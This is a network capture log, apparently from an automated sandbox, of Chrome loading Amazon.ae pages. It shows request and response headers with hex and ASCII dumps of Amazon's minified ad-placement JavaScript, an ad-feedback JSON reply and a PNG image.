                                                                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 46daee71-1e80-4bd2-8a0a-6255bc1c8421
                                                                                                                                                                                                                                                                      Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 08 Aug 2024 13:22:39 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                      Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 559491
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:42 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200147-IAD, cache-ewr-kewr1740033-EWR
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 28 28 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 2e 64 65 66 61 75 6c 74 3a 65 7d 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 3a 22 29 7d 2c 69 3d 2f 28 5c 2f 62 7c 5c 2f 73 7c 5c 2f 6c 29 2e 2a 28 6e 6f 64 65 3d 29 28 5c 64 7b 31 2c 31 32 7d 29 2f 2c 6e 3d 6e 65 77 20 4d 61 70 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6e 2e 68 61 73 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 76 61 72 20 65 3d 69 2e 65 78 65 63 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 74 3d 65 26 26 65 5b 33 5d 3f 65 5b 33 5d 3a 6e 75 6c 6c 3b 6e 2e 73 65 74 28
                                                                                                                                                                                                                                                                      Data Ascii: (()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 20 45 72 72 6f 72 28 65 29 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 69 66 28 77 69 6e 64 6f 77 2e 63 73 61 29 74 72 79 7b 77 69 6e 64 6f 77 2e 63 73 61 28 22 43 6f 6e 74 65 6e 74 22 2c 7b 65 6c 65 6d 65 6e 74 3a 65 7d 29 28 22 6d 61 72 6b 22 2c 74 2c 6e 75 6c 6c 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 67 65 74 54 69 6d 65 28 29 29 7d 63 61 74 63 68 28 6e 29 7b 75 28 22 45 72 72 6f 72 20 77 69 74 68 20 27 6d 61 72 6b 27 20 43 53 41 22 2c 6e 29 7d 7d 3b 63 6c 61 73 73 20 79 7b 73 65 6e 64 4c 61 74 65 6e 63 79 4d 65 74 72 69 63 28 7b 6c 61 74 65 6e 63 79 4d 65 74 72 69 63 54 79 70 65 3a 65 2c 70 6c 61 63 65 6d 65 6e 74 49 64 3a 74 2c 70 6c 61 63 65 6d 65 6e 74 4e 61 6d 65 3a 69 2c 70 6c 61 63 65 6d 65 6e 74 44 69 76 49 64 3a 6e 2c 74 69 6d
                                                                                                                                                                                                                                                                      Data Ascii: Error(e)},g=function(e,t,i){if(window.csa)try{window.csa("Content",{element:e})("mark",t,null==i?void 0:i.getTime())}catch(n){u("Error with 'mark' CSA",n)}};class y{sendLatencyMetric({latencyMetricType:e,placementId:t,placementName:i,placementDivId:n,tim
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 65 2b 2b 29 7b 63 6f 6e 73 74 20 74 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 6b 65 79 28 65 29 3b 69 66 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 74 61 72 74 73 57 69 74 68 28 41 29 29 7b 63 6f 6e 73 74 20 69 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 74 29 3b 69 66 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 74 29 2c 65 3d 2d 31 2c 6e 75 6c 6c 3d 3d 3d 69 29 63 6f 6e 74 69 6e 75 65 3b 79 69 65 6c 64 5b 74 2c 69 5d 7d 7d 7d 7d 63 6f 6e 73 74 20 44 3d 28 65 2c 74 2c 69 29 3d 3e 7b 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 45 28 65 2c 74 29 2c 69 29 7d 2c 4d 3d 28 65 2c 74 2c 69 29 3d 3e 28 2e 2e 2e 6e 29 3d 3e 7b 74 72 79 7b 65 28 2e 2e 2e 6e 29 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                                                      Data Ascii: e++){const t=localStorage.key(e);if(null==t?void 0:t.startsWith(A)){const i=localStorage.getItem(t);if(localStorage.removeItem(t),e=-1,null===i)continue;yield[t,i]}}}}const D=(e,t,i)=>{localStorage.setItem(E(e,t),i)},M=(e,t,i)=>(...n)=>{try{e(...n)}catch(
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 28 4f 28 65 29 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 74 29 2c 69 29 7d 3b 70 28 65 2c 69 2e 69 64 2c 6e 29 2c 70 28 65 2c 73 28 69 2e 69 64 29 2c 6e 29 2c 70 28 65 2c 74 28 69 2e 6e 61 6d 65 29 2c 6e 29 2c 70 28 65 2c 6f 28 74 28 69 2e 6e 61 6d 65 29 29 2c 6e 29 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 69 2c 6e 2c 61 2c 6f 2c 73 2c 72 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 21 57 28 29 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 3d 6e 75 6c 6c 21 3d 3d 28 69 3d 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 7b 7d 2c 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 2e 63 73 6d 43 61 63 68 65 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 77 69
                                                                                                                                                                                                                                                                      Data Ascii: (O(e),":").concat(t),i)};p(e,i.id,n),p(e,s(i.id),n),p(e,t(i.name),n),p(e,o(t(i.name)),n)},H=function(e,t){var i,n,a,o,s,r;if(void 0===t&&(t=1),!W())return window.safeframe=null!==(i=window.safeframe)&&void 0!==i?i:{},window.safeframe.csmCache=null!==(n=wi
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 69 66 72 61 6d 65 3a 69 6e 6e 65 72 68 74 6d 6c 3a 65 78 69 73 74 22 29 3a 28 48 28 22 67 65 74 69 66 72 61 6d 65 3a 61 64 6d 61 70 3a 69 66 72 61 6d 65 3a 69 6e 6e 65 72 68 74 6d 6c 3a 75 6e 64 65 66 69 6e 65 64 22 29 2c 69 5b 74 5d 2e 69 66 72 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 7c 7c 48 28 22 67 65 74 69 66 72 61 6d 65 3a 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 3a 75 6e 64 65 66 69 6e 65 64 22 29 29 3a 48 28 22 67 65 74 69 66 72 61 6d 65 3a 61 64 6d 61 70 3a 69 66 72 61 6d 65 3a 75 6e 64 65 66 69 6e 65 64 22 29 3b 72 65 74 75 72 6e 20 69 5b 74 5d 2e 69 66 72 61 6d 65 7d 2c 71 3d 5b 7b 70 3a 35 30 2c 74 3a 32 2c 64 65
                                                                                                                                                                                                                                                                      Data Ascii: iframe:innerhtml:exist"):(H("getiframe:admap:iframe:innerhtml:undefined"),i[t].iframe=document.getElementById(a),document.getElementById(a)||H("getiframe:getElementById:undefined")):H("getiframe:admap:iframe:undefined");return i[t].iframe},q=[{p:50,t:2,de
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 2c 69 2e 62 29 2d 69 2e 74 29 2c 72 3d 6f 2a 73 2f 28 69 2e 68 2a 4d 61 74 68 2e 6d 69 6e 28 69 2e 77 2c 61 29 29 3b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 4d 61 74 68 2e 6d 69 6e 28 31 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 72 29 29 2e 74 6f 46 69 78 65 64 28 32 29 29 7d 28 65 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 22 75 6e 6b 6e 6f 77 6e 22 3a 74 3e 3d 2e 35 7d 2c 69 65 3d 65 3d 3e 30 3d 3d 3d 65 2e 77 69 64 74 68 26 26 30 3d 3d 3d 65 2e 68 65 69 67 68 74 3b 63 6f 6e 73 74 20 6e 65 3d 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 59 28 29 2c 69 3d 4a 28 29 2c 6e 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 72 65 28 65 2e 74 2c 65 2e 62 2c 69 29 29 2c 61 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 72 65 28 65 2e 6c 2c 65 2e 72 2c 74 29 29 2c 6f 3d 6e 2a 61 2c 73 3d 65
                                                                                                                                                                                                                                                                      Data Ascii: ,i.b)-i.t),r=o*s/(i.h*Math.min(i.w,a));return Number(Math.min(1,Math.max(0,r)).toFixed(2))}(e);return null==t?"unknown":t>=.5},ie=e=>0===e.width&&0===e.height;const ne=e=>{const t=Y(),i=J(),n=Math.max(0,re(e.t,e.b,i)),a=Math.max(0,re(e.l,e.r,t)),o=n*a,s=e
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 58 2d 65 2e 6f 72 69 67 69 6e 61 6c 53 63 72 6f 6c 6c 58 29 3b 72 65 74 75 72 6e 7b 74 6f 70 3a 69 2c 62 6f 74 74 6f 6d 3a 6e 2c 6c 65 66 74 3a 61 2c 72 69 67 68 74 3a 61 2b 65 2e 61 64 57 69 64 74 68 2c 77 69 64 74 68 3a 65 2e 61 64 57 69 64 74 68 2c 68 65 69 67 68 74 3a 65 2e 61 64 48 65 69 67 68 74 7d 7d 2c 70 65 3d 22 62 74 72 5f 63 6c 69 65 6e 74 22 2c 68 65 3d 22 63 6f 64 5f 63 6c 69 65 6e 74 22 2c 75 65 3d 22 6c 6f 63 61 6c 73 74 6f 72 61 67 65 5f 69 6d 70 72 65 73 73 69 6f 6e 22 2c 77 65 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 72 65 74 75 72 6e 20 69 2e 69 64 3d 65 2c 69 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79
                                                                                                                                                                                                                                                                      Data Ascii: indow.scrollX-e.originalScrollX);return{top:i,bottom:n,left:a,right:a+e.adWidth,width:e.adWidth,height:e.adHeight}},pe="btr_client",he="cod_client",ue="localstorage_impression",we=(e,t)=>{const i=document.createElement("img");return i.id=e,i.style.display
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 72 6f 6d 54 6f 70 24 2f 67 2e 65 78 65 63 28 65 29 3b 69 66 28 21 4d 65 28 65 29 29 7b 69 66 28 65 2e 6d 61 74 63 68 28 22 5b 5e 3a 5d 2b 3a 2e 2b 22 29 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 73 70 6c 69 74 28 22 3a 22 29 2c 6e 3d 74 5b 31 5d 2c 61 3d 74 2e 6c 65 6e 67 74 68 3e 32 3f 74 5b 32 5d 3a 6e 3b 69 66 28 69 29 72 65 74 75 72 6e 20 61 77 61 69 74 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 65 3d 3e 50 2e 77 68 65 6e 28 61 2c 22 41 22 29 2e 65 78 65 63 75 74 65 28 65 29 29 29 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 4e 65 65 64 20 41 55 49 20 6f 72 20 41 6d 61 7a 6f 6e 4a 51 20 69 6e 73 74 61 6c 6c 65 64 22 29 7d 72 65 74 75 72 6e 20 65 2e 6d 61 74 63 68 28 2f 5e 5c 64 7b 31 2c 34 7d 70 78 24 2f 67 29 3f 61 77 61 69 74 20 50 65 28 70 61 72
                                                                                                                                                                                                                                                                      Data Ascii: romTop$/g.exec(e);if(!Me(e)){if(e.match("[^:]+:.+")){const t=e.split(":"),n=t[1],a=t.length>2?t[2]:n;if(i)return await new Promise((e=>P.when(a,"A").execute(e)));throw new Error("Need AUI or AmazonJQ installed")}return e.match(/^\d{1,4}px$/g)?await Pe(par
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 22 2b 74 2e 69 64 2c 6d 65 74 72 69 63 56 61 6c 75 65 3a 69 7d 2c 7b 65 6e 74 3a 22 61 6c 6c 22 7d 29 7d 63 61 74 63 68 28 6e 29 7b 75 28 22 45 72 72 6f 72 20 77 69 74 68 20 27 6c 6f 67 43 73 61 45 76 65 6e 74 27 20 43 53 41 22 2c 6e 29 7d 7d 2c 5f 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 77 69 6e 64 6f 77 2e 63 73 61 29 74 72 79 7b 77 69 6e 64 6f 77 2e 63 73 61 28 22 45 76 65 6e 74 73 22 2c 7b 70 72 6f 64 75 63 65 72 49 64 3a 22 61 64 70 6c 61 63 65 6d 65 6e 74 73 22 7d 29 28 22 6c 6f 67 22 2c 7b 73 63 68 65 6d 61 49 64 3a 22 41 70 65 53 61 66 65 66 72 61 6d 65 2e 63 73 61 45 76 65 6e 74 2e 31 22 2c 6d 65 74 72 69 63 4e 61 6d 65 3a 65 2c 6d 65 74 72 69 63 56 61 6c 75 65 3a 74 7d 2c 7b
                                                                                                                                                                                                                                                                      Data Ascii: "+t.id,metricValue:i},{ent:"all"})}catch(n){u("Error with 'logCsaEvent' CSA",n)}},_e=function(e,t){if(void 0===t&&(t=1),window.csa)try{window.csa("Events",{producerId:"adplacements"})("log",{schemaId:"ApeSafeframe.csaEvent.1",metricName:e,metricValue:t},{


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      29192.168.2.54973652.222.236.764432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1531OUTGET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22slotName%22%3A%22right-2%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: www.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      device-memory: 8
                                                                                                                                                                                                                                                                      rtt: 200
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-viewport-width: 1280
                                                                                                                                                                                                                                                                      sec-ch-device-memory: 8
                                                                                                                                                                                                                                                                      viewport-width: 1280
                                                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                      dpr: 1
                                                                                                                                                                                                                                                                      downlink: 4.85
                                                                                                                                                                                                                                                                      sec-ch-dpr: 1
                                                                                                                                                                                                                                                                      ect: 4g
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264920835
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:42 GMT
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      x-amz-rid: HYFP8B9QAEKV6VWKF8F5
                                                                                                                                                                                                                                                                      set-cookie: ubid-acbae=260-8031893-3804011; Domain=.amazon.ae; Expires=Thu, 21-Aug-2025 18:28:42 GMT; Path=/; Secure
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                                                                                      content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1;
                                                                                                                                                                                                                                                                      Accept-CH-Lifetime: 86400
                                                                                                                                                                                                                                                                      Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      Via: 1.1 10f3c0984ab3eaba3e5720ed830a77b6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA56-P4
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: W0tNQKrsqQxFWLBaGhJ-Qo_-yJPX6M7mcgt-qyXhWHA3Gf4HFbSObQ==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC4757INData Raw: 31 32 38 64 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 68 74 6d 6c 22 3a 22 3c 61 20 64 61 74 61 2d 61 2d 6d 6f 64 61 6c 3d 5c 22 7b 26 71 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 61 66 2f 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 3f 70 6c 3d 25 37 42 25 32 32 61 64 50 6c 61 63 65 6d 65 6e 74 4d 65 74 61 44 61 74 61 25 32 32 25 33 41 25 37 42 25 32 32 70 61 67 65 55 72 6c 25 32 32 25 33 41 25 32 32 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63 75 59 57 31 68 65 6d 39 75 4c 6d 46 6c 4c 7a 38 25 33 44 25 32 32 25 32 43 25 32 32 61 64 45 6c 65 6d 65 6e 74 49 64 25 32 32 25 33 41 25 32 32 61 70 65 5f 47 61 74 65 77 61 79 5f 72 69 67 68 74 2d 32 5f 64 65 73 6b 74 6f 70 5f 70 6c 61 63 65 6d 65 6e 74 25 32 32 25 32 43 25 32 32 70 61
                                                                                                                                                                                                                                                                      Data Ascii: 128d{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pa
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC20INData Raw: 66 0d 0a 75 6d 65 6e 74 2c 20 4d 61 74 68 29 3b 22 7d 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: fument, Math);"}
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      30192.168.2.549758151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC626OUTGET /images/S/sash/Z8YwjOjqIHxqujG.png HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://images-eu.ssl-images-amazon.com/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 45977
                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 660b3c6d-b61b-4d1d-a46e-6d434f8f30e8
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 05 Jul 2024 14:44:16 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Expires: Mon, 04 Jul 2044 13:11:11 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:42 GMT
                                                                                                                                                                                                                                                                      Age: 2606773
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100072-IAD, cache-nyc-kteb1890094-NYC
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c2 00 00 01 27 08 06 00 00 00 fb 1f 9c b4 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 4b 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 54 69 a2 12 92 00 a1 84 18 12 40 ec 88 a8 c0 88 a2 22 82 15 19 14 71 c0 d1 11 90 b1 22 8a 85 41 b1 f7 01 79 08 28 e3 e0 28 36 54 de 0f de 1a 7d b3 e6 bd 37 6f f6 af bd f6 39 67 9d ef 9c 7d 3e 00 46 60 b0 44 9a 85 aa 01 64 4a 15 f2 88 00 1f 3c 36 2e 1e 27 77 03 0a 54 20 81 03 80 40 98 2d 0b 89 f4 8f 02 00 e0 fb f1 f0 ec 88 00 1f f8 02 04 e0 cd 6d 40 00 00 6e d8 04 86 e1 38 fc 7f 50 17 ca e4 0a 00 24 0c 00 a6 8b c4 d9 42 00 a4 10 00 32 72 15 32 05 00
                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR'gAMAaKiCCPsRGB IEC61966-2.1HSgTS=BKKoR RBTi@"q"Ay((6T}7o9g}>F`DdJ<6.'wT @-m@n8P$B2r2
